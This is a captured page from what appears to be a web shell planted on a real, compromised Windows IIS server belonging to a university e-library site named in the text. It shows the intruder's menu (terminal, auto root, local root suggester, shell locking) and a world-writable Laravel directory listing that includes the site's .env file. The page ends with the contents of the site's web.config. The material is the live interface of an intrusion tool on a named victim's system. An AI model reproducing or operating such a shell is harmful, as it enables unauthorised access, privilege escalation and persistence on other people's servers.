Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
Server IP : & Your IP : 3.144.165.218
Domains :
Cant Read [ /etc/named.conf ]
User : elibrary.unsap.ac.id
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
D: /
localhost /
ppp /
Relawan /
Delete
Unzip
Name
Size
Permission
Date
Action
Modules
[ DIR ]
drwxrwxrwx
2023-12-09 02:53
app
[ DIR ]
drwxrwxrwx
2023-12-09 02:53
bootstrap
[ DIR ]
drwxrwxrwx
2023-12-09 02:53
config
[ DIR ]
drwxrwxrwx
2023-12-09 02:53
database
[ DIR ]
drwxrwxrwx
2023-12-09 02:53
docker
[ DIR ]
drwxrwxrwx
2023-12-09 02:53
gacor
[ DIR ]
drwxrwxrwx
2024-03-23 16:48
lang
[ DIR ]
drwxrwxrwx
2023-12-09 02:53
public
[ DIR ]
drwxrwxrwx
2023-07-09 22:54
resources
[ DIR ]
drwxrwxrwx
2023-12-09 02:53
routes
[ DIR ]
drwxrwxrwx
2023-12-09 02:53
storage
[ DIR ]
drwxrwxrwx
2023-12-09 02:53
tests
[ DIR ]
drwxrwxrwx
2023-12-09 02:53
vendor
[ DIR ]
drwxrwxrwx
2023-06-07 16:13
.DS_Store
8
KB
-rw-rw-rw-
2023-07-09 22:54
.editorconfig
276
B
-rw-rw-rw-
2023-06-07 16:07
.env
1.11
KB
-rw-rw-rw-
2023-06-07 16:41
.env.example
1.1
KB
-rw-rw-rw-
2023-06-07 16:07
.gitattributes
190
B
-rw-rw-rw-
2023-06-07 16:07
.gitignore
219
B
-rw-rw-rw-
2023-06-07 16:07
README.md
4.1
KB
-rw-rw-rw-
2023-06-07 16:07
artisan
1.7
KB
-rw-rw-rw-
2023-06-07 16:07
composer.json
2.17
KB
-rw-rw-rw-
2023-06-07 16:07
composer.lock
331.02
KB
-rw-rw-rw-
2023-06-07 16:13
index.php
215
B
-rw-rw-rw-
2024-03-15 23:24
package.json
299
B
-rw-rw-rw-
2023-06-07 16:07
phpunit.xml
1.18
KB
-rw-rw-rw-
2023-06-07 16:07
sail
14.95
KB
-rw-rw-rw-
2023-06-07 16:07
vite.config.js
274
B
-rw-rw-rw-
2023-06-07 16:07
web.config
1005
B
-rw-rw-rw-
2023-07-21 14:15
Save
Rename
<?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <defaultDocument> <files> <clear /> <add value="index.php" /> </files> </defaultDocument> <rewrite> <rules> <rule name="Laravel Force public"> <match url="(.*)" ignoreCase="false" /> <action type="Rewrite" url="public/{R:1}" /> </rule> <rule name="Laravel Routes" stopProcessing="true"> <conditions> <add input="{REQUEST_FILENAME}" matchType="IsFile" negate="true" /> <add input="{REQUEST_FILENAME}" matchType="IsDirectory" negate="true" /> </conditions> <match url="^" ignoreCase="false" /> <action type="Rewrite" url="public/index.php" /> </rule> </rules> </rewrite> </system.webServer> </configuration>